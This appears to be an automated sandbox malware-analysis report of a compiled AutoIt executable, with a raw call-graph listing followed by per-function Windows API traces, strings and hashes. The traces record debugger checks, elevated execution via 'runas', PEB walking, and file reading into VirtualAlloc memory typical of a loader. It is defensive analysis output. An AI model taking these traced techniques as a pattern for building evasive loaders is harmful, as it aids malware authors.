106803->106804 106805 bc3688 106804->106805 106806 bc36e7 106804->106806 106843 bc36e5 106804->106843 106807 bc374b PostQuitMessage 106805->106807 106808 bc3695 106805->106808 106810 bc36ed 106806->106810 106811 bfd0cc 106806->106811 106835 bc36d8 106807->106835 106813 bfd154 106808->106813 106814 bc36a0 106808->106814 106809 bc36ca DefWindowProcW 106809->106835 106815 bc3715 SetTimer RegisterWindowMessageW 106810->106815 106816 bc36f2 106810->106816 106858 bd1070 10 API calls Mailbox 106811->106858 106863 c22527 71 API calls _memset 106813->106863 106820 bc36a8 106814->106820 106821 bc3755 106814->106821 106822 bc373e CreatePopupMenu 106815->106822 106815->106835 106817 bfd06f 106816->106817 106818 bc36f9 KillTimer 106816->106818 106830 bfd0a8 MoveWindow 106817->106830 106831 bfd074 106817->106831 106855 bc443a Shell_NotifyIconW _memset 106818->106855 106819 bfd0f3 106859 bd1093 342 API calls Mailbox 106819->106859 106826 bfd139 106820->106826 106827 bc36b3 106820->106827 106848 bc44a0 106821->106848 106822->106835 106826->106809 106862 c17c36 59 API calls Mailbox 106826->106862 106833 bc36be 106827->106833 106834 bfd124 106827->106834 106828 bfd166 106828->106809 106828->106835 106830->106835 106836 bfd078 106831->106836 106837 bfd097 SetFocus 106831->106837 106832 bc370c 106856 bc3114 DeleteObject DestroyWindow Mailbox 106832->106856 106833->106809 106860 bc443a Shell_NotifyIconW _memset 106833->106860 106861 c22d36 81 API calls _memset 106834->106861 106836->106833 106841 bfd081 106836->106841 106837->106835 106857 bd1070 10 API calls Mailbox 106841->106857 106842 bfd134 106842->106835 106843->106809 106846 bfd118 106847 bc434a 68 API calls 106846->106847 106847->106843 106849 bc4539 106848->106849 106850 bc44b7 _memset 106848->106850 106849->106835 106851 bc407c 61 API calls 106850->106851 106854 bc44de 106851->106854 106852 bc4522 KillTimer SetTimer 106852->106849 106853 bfd4ab Shell_NotifyIconW 106853->106852 106854->106852 106854->106853 106855->106832 106856->106835 106857->106835 106858->106819 106859->106833 106860->106846 106861->106842 106862->106843 106863->106828 106864 c0416f 106868 c15fe6 106864->106868 106866 c0417a 106867 c15fe6 86 API calls 106866->106867 106867->106866 106869 c16020 106868->106869 106874 c15ff3 106868->106874 106869->106866 106870 c16022 106880 bc9328 85 API calls Mailbox 106870->106880 106872 c16027 106873 bc9837 85 API calls 106872->106873 106875 c1602e 106873->106875 106874->106869 106874->106870 106874->106872 106877 c1601a 106874->106877 106876 bc7b2e 59 API calls 106875->106876 106876->106869 106879 bc95a0 59 API calls _wcsstr 106877->106879 106879->106869 106880->106872 106881 c28d0d 106882 c28d20 106881->106882 106883 c28d1a 106881->106883 106885 c28d31 106882->106885 106886 be2d55 _free 58 API calls 106882->106886 106884 be2d55 _free 58 API calls 106883->106884 106884->106882 106887 c28d43 106885->106887 106888 be2d55 _free 58 API calls 106885->106888 106886->106885 106888->106887 106889 f5c360 106903 f59fb0 106889->106903 106891 f5c469 106906 f5c250 106891->106906 106909 f5d490 GetPEB 106903->106909 106905 f5a63b 106905->106891 106907 f5c259 Sleep 106906->106907 106908 f5c267 106907->106908 106910 f5d4ba 106909->106910 106910->106905 106911 bffe27 106924 bdf944 106911->106924 106913 bffe3d 106914 bffebe 106913->106914 106915 bffe53 106913->106915 106918 bcfce0 342 API calls 106914->106918 106933 bc9e5d 60 API calls 106915->106933 106917 bffe92 106919 c0089c 106917->106919 106921 bffe9a 106917->106921 106923 bffeb2 Mailbox 106918->106923 106935 c29e4a 90 API calls 4 library calls 106919->106935 106934 c2834f 59 API calls Mailbox 106921->106934 106923->106923 106925 bdf950 106924->106925 106926 bdf962 106924->106926 106927 bc9d3c 60 API calls 106925->106927 106928 bdf968 106926->106928 106929 bdf991 106926->106929 106932 bdf95a 106927->106932 106931 be0db6 Mailbox 59 API calls 106928->106931 106930 bc9d3c 60 API calls 106929->106930 106930->106932 106931->106932 106932->106913 106933->106917 106934->106923 106935->106923 106936 bc1066 106941 bcf76f 106936->106941 106938 bc106c 106939 be2d40 __cinit 67 API calls 106938->106939 106940 bc1076 106939->106940 106942 bcf790 106941->106942 106974 bdff03 106942->106974 106946 bcf7d7 106947 bc7667 59 API calls 106946->106947 106948 bcf7e1 106947->106948 106949 bc7667 59 API calls 106948->106949 106950 bcf7eb 106949->106950 106951 bc7667 59 API calls 106950->106951 106952 bcf7f5 106951->106952 106953 bc7667 59 API calls 106952->106953 106954 bcf833 106953->106954 106955 bc7667 59 API calls 106954->106955 106956 bcf8fe 106955->106956 106984 bd5f87 106956->106984 106960 bcf930 106961 bc7667 59 API calls 106960->106961 106962 bcf93a 106961->106962 107012 bdfd9e 106962->107012 106964 bcf981 106965 bcf991 GetStdHandle 106964->106965 106966 bcf9dd 106965->106966 106967 c045ab 106965->106967 106968 bcf9e5 OleInitialize 106966->106968 106967->106966 106969 c045b4 106967->106969 106968->106938 107019 c26b38 64 API calls Mailbox 106969->107019 106971 c045bb 107020 c27207 CreateThread 106971->107020 106973 c045c7 CloseHandle 106973->106968 107021 bdffdc 106974->107021 106977 bdffdc 59 API calls 106978 bdff45 106977->106978 106979 bc7667 59 API calls 106978->106979 106980 bdff51 106979->106980 106981 bc7bcc 59 API calls 106980->106981 106982 bcf796 106981->106982 106983 be0162 6 API calls 106982->106983 106983->106946 106985 bc7667 59 API calls 106984->106985 106986 bd5f97 106985->106986 106987 bc7667 59 API calls 106986->106987 106988 bd5f9f 106987->106988 107028 bd5a9d 106988->107028 106991 bd5a9d 59 API calls 106992 bd5faf 106991->106992 106993 bc7667 59 API calls 106992->106993 106994 bd5fba 106993->106994 106995 be0db6 Mailbox 59 API calls 106994->106995 106996 bcf908 106995->106996 106997 bd60f9 106996->106997 106998 bd6107 106997->106998 106999 bc7667 59 API calls 106998->106999 107000 bd6112 106999->107000 107001 bc7667 59 API calls 107000->107001 107002 bd611d 107001->107002 107003 bc7667 59 API calls 107002->107003 107004 bd6128 107003->107004 107005 bc7667 59 API calls 107004->107005 107006 bd6133 107005->107006 107007 bd5a9d 59 API calls 107006->107007 107008 bd613e 107007->107008 107009 be0db6 Mailbox 59 API calls 107008->107009 107010 bd6145 RegisterWindowMessageW 107009->107010 107010->106960 107013 bdfdae 107012->107013 107014 c1576f 107012->107014 107016 be0db6 Mailbox 59 API calls 107013->107016 107031 c29ae7 60 API calls 107014->107031 107018 bdfdb6 107016->107018 107017 c1577a 107018->106964 107019->106971 107020->106973 107032 c271ed 65 API calls 107020->107032 107022 bc7667 59 API calls 107021->107022 107023 bdffe7 107022->107023 107024 bc7667 59 API calls 107023->107024 107025 bdffef 107024->107025 107026 bc7667 59 API calls 107025->107026 107027 bdff3b 107026->107027 107027->106977 107029 bc7667 59 API calls 107028->107029 107030 bd5aa5 107029->107030 107030->106991 107031->107017 107033 f5c90b 107034 f5c910 107033->107034 107035 f59fb0 GetPEB 107034->107035 107036 f5c91c 107035->107036 107037 f5c9d0 107036->107037 107038 f5c93a 107036->107038 107055 f5d280 9 API calls 107037->107055 107042 f5c5e0 107038->107042 107041 f5c9b7 107043 f59fb0 GetPEB 107042->107043 107044 f5c67f 107043->107044 107047 f5c6d9 VirtualAlloc 107044->107047 107052 f5c6bd 107044->107052 107053 f5c7e0 CloseHandle 107044->107053 107054 f5c7f0 VirtualFree 107044->107054 107056 f5d4f0 GetPEB 107044->107056 107046 f5c6b0 CreateFileW 107046->107044 107046->107052 107048 f5c6fa ReadFile 107047->107048 107047->107052 107051 f5c718 VirtualAlloc 107048->107051 107048->107052 107049 f5c8cc VirtualFree 107050 f5c8da 107049->107050 107050->107041 107051->107044 107051->107052 107052->107049 107052->107050 107053->107044 107054->107044 107055->107041 107057 f5d51a 107056->107057 107057->107046

                                                  Executed Functions

                                                  Function 00BC3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B68
                                                  • IsDebuggerPresent.KERNEL32 ref: 00BC3B7A
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,(l,00C852E0,?,?), ref: 00BC3BEB
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                    • Part of subcall function 00BD092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BC3C14,(l,?,?,?), ref: 00BD096E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C6F
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C77770,00000010), ref: 00BFD281
                                                  • SetCurrentDirectoryW.KERNEL32(?,(l,?,?,?), ref: 00BFD2B9
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C74260,(l,?,?,?), ref: 00BFD33F
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00BFD346
                                                    • Part of subcall function 00BC3A46: GetSysColorBrush.USER32(0000000F), ref: 00BC3A50
                                                    • Part of subcall function 00BC3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A5F
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(00000063), ref: 00BC3A76
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(000000A4), ref: 00BC3A88
                                                    • Part of subcall function 00BC3A46: LoadIconW.USER32(000000A2), ref: 00BC3A9A
                                                    • Part of subcall function 00BC3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AC0
                                                    • Part of subcall function 00BC3A46: RegisterClassExW.USER32(?), ref: 00BC3B16
                                                    • Part of subcall function 00BC39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC3A03
                                                    • Part of subcall function 00BC39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC3A24
                                                    • Part of subcall function 00BC39D5: ShowWindow.USER32(00000000,?,?), ref: 00BC3A38
                                                    • Part of subcall function 00BC39D5: ShowWindow.USER32(00000000,?,?), ref: 00BC3A41
                                                    • Part of subcall function 00BC434A: _memset.LIBCMT ref: 00BC4370
                                                    • Part of subcall function 00BC434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC4415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: (l$This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3556933902
                                                  • Opcode ID: 3a5174ef5565e9f6987ef734a1ac0c62a4f1031d649862ece7f8b88119aacdca
                                                  • Instruction ID: f3001383ba4d8498d515d73420788269edd76abb557276aa0452ad650dc473d3
                                                  • Opcode Fuzzy Hash: 3a5174ef5565e9f6987ef734a1ac0c62a4f1031d649862ece7f8b88119aacdca
                                                  • Instruction Fuzzy Hash: 1551B270A48208AACF11EBB4DC55FAE7BF9EB45714F4080EDF411A61A2DEB05645CB25
                                                  Function 00BC49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 996 bc49a0-bc4a00 call bc7667 GetVersionExW call bc7bcc 1001 bc4b0b-bc4b0d 996->1001 1002 bc4a06 996->1002 1004 bfd767-bfd773 1001->1004 1003 bc4a09-bc4a0e 1002->1003 1006 bc4a14 1003->1006 1007 bc4b12-bc4b13 1003->1007 1005 bfd774-bfd778 1004->1005 1009 bfd77b-bfd787 1005->1009 1010 bfd77a 1005->1010 1008 bc4a15-bc4a4c call bc7d2c call bc7726 1006->1008 1007->1008 1018 bfd864-bfd867 1008->1018 1019 bc4a52-bc4a53 1008->1019 1009->1005 1012 bfd789-bfd78e 1009->1012 1010->1009 1012->1003 1014 bfd794-bfd79b 1012->1014 1014->1004 1016 bfd79d 1014->1016 1020 bfd7a2-bfd7a5 1016->1020 1021 bfd869 1018->1021 1022 bfd880-bfd884 1018->1022 1019->1020 1023 bc4a59-bc4a64 1019->1023 1024 bfd7ab-bfd7c9 1020->1024 1025 bc4a93-bc4aaa GetCurrentProcess IsWow64Process 1020->1025 1030 bfd86c 1021->1030 1026 bfd86f-bfd878 1022->1026 1027 bfd886-bfd88f 1022->1027 1031 bfd7ea-bfd7f0 1023->1031 1032 bc4a6a-bc4a6c 1023->1032 1024->1025 1033 bfd7cf-bfd7d5 1024->1033 1028 bc4aac 1025->1028 1029 bc4aaf-bc4ac0 1025->1029 1026->1022 1027->1030 1036 bfd891-bfd894 1027->1036 1028->1029 1037 bc4b2b-bc4b35 GetSystemInfo 1029->1037 1038 bc4ac2-bc4ad2 call bc4b37 1029->1038 1030->1026 1034 bfd7fa-bfd800 1031->1034 1035 bfd7f2-bfd7f5 1031->1035 1039 bfd805-bfd811 1032->1039 1040 bc4a72-bc4a75 1032->1040 1041 bfd7df-bfd7e5 1033->1041 1042 bfd7d7-bfd7da 1033->1042 1034->1025 1035->1025 1036->1026 1043 bc4af8-bc4b08 1037->1043 1053 bc4b1f-bc4b29 GetSystemInfo 1038->1053 1054 bc4ad4-bc4ae1 call bc4b37 1038->1054 1044 bfd81b-bfd821 1039->1044 1045 bfd813-bfd816 1039->1045 1047 bc4a7b-bc4a8a 1040->1047 1048 bfd831-bfd834 1040->1048 1041->1025 1042->1025 1044->1025 1045->1025 1049 bfd826-bfd82c 1047->1049 1050 bc4a90 1047->1050 1048->1025 1052 bfd83a-bfd84f 1048->1052 1049->1025 1050->1025 1055 bfd859-bfd85f 1052->1055 1056 bfd851-bfd854 1052->1056 1057 bc4ae9-bc4aed 1053->1057 1061 bc4b18-bc4b1d 1054->1061 1062 bc4ae3-bc4ae7 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1043 1060 bc4aef-bc4af2 FreeLibrary 1057->1060 1060->1043 1061->1062 1062->1057
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00BC49CD
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • GetCurrentProcess.KERNEL32(?,00C4FAEC,00000000,00000000,?), ref: 00BC4A9A
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00BC4AA1
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BC4AE7
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00BC4AF2
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BC4B23
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BC4B2F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: 0b6599d17d22f29dc7f6a98ae06e81d8c82c1929f36639aa5dfbbb1b5a21335f
                                                  • Instruction ID: f4466dbbed24a7c0cdf54ba444cfc99202ecf96717aa7dfac2a0737eefa937e2
                                                  • Opcode Fuzzy Hash: 0b6599d17d22f29dc7f6a98ae06e81d8c82c1929f36639aa5dfbbb1b5a21335f
                                                  • Instruction Fuzzy Hash: 1391C8319897C4DEC731DB6885A06AAFFF5AF3A300B4849DDE0C797A41D720A90CD759
                                                  Function 00BC4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1063 bc4e89-bc4ea1 CreateStreamOnHGlobal 1064 bc4ec1-bc4ec6 1063->1064 1065 bc4ea3-bc4eba FindResourceExW 1063->1065 1066 bfd933-bfd942 LoadResource 1065->1066 1067 bc4ec0 1065->1067 1066->1067 1068 bfd948-bfd956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 bfd95c-bfd967 LockResource 1068->1069 1069->1067 1070 bfd96d-bfd98b 1069->1070 1070->1067
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BC4D8E,?,?,00000000,00000000), ref: 00BC4E99
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BC4D8E,?,?,00000000,00000000), ref: 00BC4EB0
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F), ref: 00BFD937
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F), ref: 00BFD94C
                                                  • LockResource.KERNEL32(00BC4D8E,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F,00000000), ref: 00BFD95F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 5133cedf063f58f81d44ba8347eadd584e19f3ba5409af72242c2c5031bbbaf4
                                                  • Instruction ID: 09352f5bf6e8f90cdc86c7ab19c1c00b76958be6b5cf3c0af188e7242eda2b84
                                                  • Opcode Fuzzy Hash: 5133cedf063f58f81d44ba8347eadd584e19f3ba5409af72242c2c5031bbbaf4
                                                  • Instruction Fuzzy Hash: 10115E75240701BFD7258B65EC48F6B7BBAFBC6B11F1082ACF54586250DBA1E9018670
                                                  Function 00BCFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID:
                                                  • API String ID: 3964851224-0
                                                  • Opcode ID: c500cc2d3b12066f43bdbac64691f0a55ea714febf844c080a662a882544003e
                                                  • Instruction ID: 1189391afe3c38577730b87bea62c465fafe9a2649d1db32da9e4a6b0a86fe27
                                                  • Opcode Fuzzy Hash: c500cc2d3b12066f43bdbac64691f0a55ea714febf844c080a662a882544003e
                                                  • Instruction Fuzzy Hash: 6A9259706183419FD724EF14C480B2ABBE1FF89304F1489ADE99A9B391E771ED45CB92
                                                  Function 00C2445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00BFE398), ref: 00C2446A
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00C2447B
                                                  • FindClose.KERNEL32(00000000), ref: 00C2448B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
                                                  • Instruction ID: 5261f7a122fc85678d365230f6f6c7710db94d7e3140480e493e8026a984954c
                                                  • Opcode Fuzzy Hash: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
                                                  • Instruction Fuzzy Hash: 67E0D8364109106B4214BB38FC0D6EE775CAE06335F10071AF935C10E0E7B459009595
                                                  Function 00BCE6A0 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.$X+
                                                  • API String ID: 0-3997231420
                                                  • Opcode ID: da34258fd8c3ee8aa55e6a3b0f17bfe8d7a54b0c10bc421a61f9cadad49d6758
                                                  • Instruction ID: 2856009045781e37f0355407c42d5f4a30bc6e560d465f6e68d687db5db39066
                                                  • Opcode Fuzzy Hash: da34258fd8c3ee8aa55e6a3b0f17bfe8d7a54b0c10bc421a61f9cadad49d6758
                                                  • Instruction Fuzzy Hash: 07A23675A00216CFCB24CF58C480FAAB7F6FB59314F2481ADE926AB251D775ED42CB90
                                                  Function 00BD09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0A5B
                                                  • timeGetTime.WINMM ref: 00BD0D16
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0E53
                                                  • Sleep.KERNEL32(0000000A), ref: 00BD0E61
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00BD0EFA
                                                  • DestroyWindow.USER32 ref: 00BD0F06
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD0F20
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C04E83
                                                  • TranslateMessage.USER32(?), ref: 00C05C60
                                                  • DispatchMessageW.USER32(?), ref: 00C05C6E
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C05C82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4212290369-3242690629
                                                  • Opcode ID: b27303eeef29f0a7d81b6d7eea645242a354ccd7b4bf39d98baaf813ce8bf743
                                                  • Instruction ID: 0e3ec9da409fab8979d8fda4305abfd7ba4b519ddb6c9451186ba7d14f5c1c94
                                                  • Opcode Fuzzy Hash: b27303eeef29f0a7d81b6d7eea645242a354ccd7b4bf39d98baaf813ce8bf743
                                                  • Instruction Fuzzy Hash: F4B2BD70608741DFD728DB24C884BAFB7E5FF84304F14496EE49A972A1DB71E984CB92
                                                  Function 00C29155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00C28F5F: __time64.LIBCMT ref: 00C28F69
                                                    • Part of subcall function 00BC4EE5: _fseek.LIBCMT ref: 00BC4EFD
                                                  • __wsplitpath.LIBCMT ref: 00C29234
                                                    • Part of subcall function 00BE40FB: __wsplitpath_helper.LIBCMT ref: 00BE413B
                                                  • _wcscpy.LIBCMT ref: 00C29247
                                                  • _wcscat.LIBCMT ref: 00C2925A
                                                  • __wsplitpath.LIBCMT ref: 00C2927F
                                                  • _wcscat.LIBCMT ref: 00C29295
                                                  • _wcscat.LIBCMT ref: 00C292A8
                                                    • Part of subcall function 00C28FA5: _memmove.LIBCMT ref: 00C28FDE
                                                    • Part of subcall function 00C28FA5: _memmove.LIBCMT ref: 00C28FED
                                                  • _wcscmp.LIBCMT ref: 00C291EF
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29824
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29837
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C29452
                                                  • _wcsncpy.LIBCMT ref: 00C294C5
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00C294FB
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C29511
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29522
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
